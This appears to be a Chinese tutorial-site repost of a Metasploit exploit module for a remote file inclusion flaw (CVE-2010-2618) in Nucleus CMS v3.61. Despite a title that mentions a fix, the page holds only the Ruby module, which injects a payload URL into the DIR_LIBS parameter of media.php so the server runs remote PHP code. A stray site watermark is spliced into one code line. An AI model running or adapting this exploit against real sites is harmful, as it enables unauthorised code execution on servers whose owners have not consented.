网站地图    收藏   

主页 > 后端 > 网站安全 >

Nucleus v3.61远程文件包含缺陷及修复 - 网站安全

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 标题: Nucleus v3.61 Remote File Include (MSF)作者: Caddy-Dz www.2cto.com下载地址: http://sourceforge.net/projects/nucleuscms/require #39;msf/core#39;class Metasploit3 Msf::Exploit......

标题: Nucleus v3.61 Remote File Include (MSF)
作者: Caddy-Dz www.2cto.com
下载地址: http://sourceforge.net/projects/nucleuscms/
 
 
 
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::Remote::HttpServer::PHPInclude
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Nucleus v3.61 Remote File Include Exploit',
            'Description'    => %q{
                    This module can be used to exploit Remote File Inclusion in Nucleus v3.61 in media.php
 
            },
            'Author'         => [ 'Caddy-Dz' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision:$',
            'References'     =>            
                [
                    [ 'CVE', '2010-2618' ],
                    [ 'BID', '41116' ],
                ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'ConnectionType' => 'find',
                        },
                    'Space'       => 262144, # 256k
                },
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Targets'        => [[ 'Automatic', { }]],
            'DisclosureDate' => 'Sep 13 2011',
            'DefaultTarget' => 0))
 
        register_options([
            OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/nucleus/media.php?DIR_LIBS=!URL!']),
            ], self.class)
    end
 
    def php_exploit
 
        timeout = 0.01
        www.2cto.com uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
        print_status("Trying uri #{uri}")
 
        response = send_request_raw( {
                'global' => true,
                'uri' => uri,
            },timeout)
 
        if response and response.code != 200
            print_error("Server returned non-200 status code (#{response.code})")
        end
        
        handler
    end
 
end
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论